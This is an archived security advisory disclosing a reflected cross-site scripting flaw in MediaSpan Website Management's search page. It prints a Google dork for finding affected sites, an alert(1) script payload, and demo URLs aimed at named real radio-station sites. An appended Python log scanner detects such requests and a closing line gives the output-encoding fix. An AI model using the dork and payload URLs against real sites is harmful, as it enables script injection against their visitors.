MediaSpan Website Management Cross Site Scripting

2012-08-25T00:00:00
ID PACKETSTORM:115889
Type packetstorm
Reporter Crim3R
Modified 2012-08-25T00:00:00

Description

                                        
`###################################################################################  
  
# Exploit Title: MediaSpan Website Management Cross Site Scripting Vulnerability  
#  
# Google Dork: intext:":Copyright © 2012 CUMULUS MEDIA and MediaSpan"  
#  
# Date: 08/24/2012  
#  
# Author: Crim3R  
#  
# Vendor Home : http://www.mediaspanonline.com/products/websitemanagement/  
#  
# Tested on: all  
#  
###################################################################################  
  
  
========================================  
There is an XSS in searchresults.asp.  
Go to the search page and enter this (or any HTML code) in the search form:  
<script>alert(1);</script>   
========================================  
D3M0 :   
http://khop.com/searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E  
  
  
http://www.993kjoy.com/searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++  
  
  
http://www.wabcradio.com/searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E++  
  
  
===============Crim3R@Att.Net===========  
  
$home = %00  
thanks to : 2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir  
`
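
To check whether requests of the kind shown in the demo URLs have reached a site running this search page, the following added example (not part of the original advisory) scans web server access log lines for `searchresults.asp` requests whose `searchFor` or `keyword` value decodes to HTML markup. The combined log format, the markup heuristic and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Parameters the advisory's demo URLs carry the payload in.
REFLECTED_PARAMS = ("searchFor", "keyword")
# Heuristic for markup in a search term: a tag opener or an inline event handler.
MARKUP = re.compile(r"<\s*/?\s*[a-z!]|\bon\w+\s*=", re.IGNORECASE)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Undo repeated URL encoding (%253C -> %3C -> <), bounded to a few rounds."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return the sorted names of search parameters in this line that carry markup."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/searchresults.asp"):
        return []
    query = parse_qs(url.query, keep_blank_values=True)  # decodes one layer
    wanted = {p.lower() for p in REFLECTED_PARAMS}
    hits = []
    for name, values in query.items():
        if name.lower() in wanted and any(MARKUP.search(fully_decode(v)) for v in values):
            hits.append(name)
    return sorted(hits)


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [24/Aug/2012:10:00:01 +0000] "GET /searchresults.asp?search=1&LOOKFOR=&searchFor=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&keyword=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E HTTP/1.1" 200 5120',
    '203.0.113.8 - - [24/Aug/2012:10:00:05 +0000] "GET /searchresults.asp?search=1&LOOKFOR=&searchFor=morning+show&keyword=morning+show HTTP/1.1" 200 4810',
    '203.0.113.9 - - [24/Aug/2012:10:00:09 +0000] "GET /searchresults.asp?search=1&keyword=%253Cimg%2520src%253Dx%253E HTTP/1.1" 200 4790',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line) or "clean")
```

Log matching of this kind only triages past requests; the fix is for the page to HTML-encode the reflected values on output (`Server.HTMLEncode` in classic ASP).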